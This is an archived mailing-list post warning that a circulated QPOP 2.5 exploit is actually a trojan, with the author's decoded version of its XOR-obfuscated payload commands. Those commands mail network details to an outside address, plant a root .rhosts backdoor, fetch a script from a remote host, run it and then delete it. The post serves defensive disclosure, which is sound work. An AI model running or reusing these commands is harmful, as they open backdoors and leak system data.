Vulnerability Development mailing list archives
TROJAN WARNING: Re: QPOP2.5* exploit ??
From: nic () BELLAMY CO NZ (Nic Bellamy)
Date: Mon, 15 May 2000 11:13:50 +1200
The "shellcode" in this is a trojan - it is self modifying (a simple xor) to obfusticate the real intention of the program, which is to run this code via "/bin/sh -c" on the local machine (reformatted for readability): /sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null echo '+ +' >> ~root/.rhosts rcp lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar tar -xvf solwar* >> /dev/null cd solwar chmod +x solwar.sh ./solwar.sh >> /dev/null cd .. rm -rf solwar* The "lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar" file does not appear to exist, so please don't flood their server trying to get it. Regards, Nic. -- Nic Bellamy <nic () bellamy co nz> Director, Bellamy Consulting Ltd.
Current thread:
- Re: QPOP2.5* exploit ??, (continued)
- Re: QPOP2.5* exploit ?? jms (May 13)
- Napster Fix optik (May 14)
- Re: QPOP2.5* exploit ?? Maurycy Prodeus (May 15)
- Re: QPOP2.5* exploit ?? jms (May 14)
- Re: QPOP2.5* exploit ?? Eric LeBlanc (May 15)
- hi sparc qpop info sp00n () GMX DE (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? Dimitry Andric (May 14)
- Re: QPOP2.5* exploit ?? Martin Ixter (May 14)
- TROJAN WARNING: Re: QPOP2.5* exploit ?? Nic Bellamy (May 14)
- Re: QPOP2.5* exploit ?? phi-vulndev () EXORSUS NET (May 14)
- Bubble Boy Virus Spreading Mechanism Andrew Leong (May 15)
- Re: QPOP2.5* exploit ?? Lluis Mora (May 15)
- Bugtraq Stats for the last 3 years available now. Alfred Huger (May 15)
- xsoldier mandrake exploit. egid=games with the right shellcode Larry C$ (May 15)
- Re: QPOP2.5* exploit ?? rpc (May 14)
- Fwd: [Newssubmission: Security vulnerability in the ICS HTTPServer component] TLsecurity.net (May 14)
- Re: regarding phrack49's stack smashing tutorial Pavel Kankovsky (May 14)
- Re: regarding phrack49's stack smashing tutorial Darshan Patil (May 14)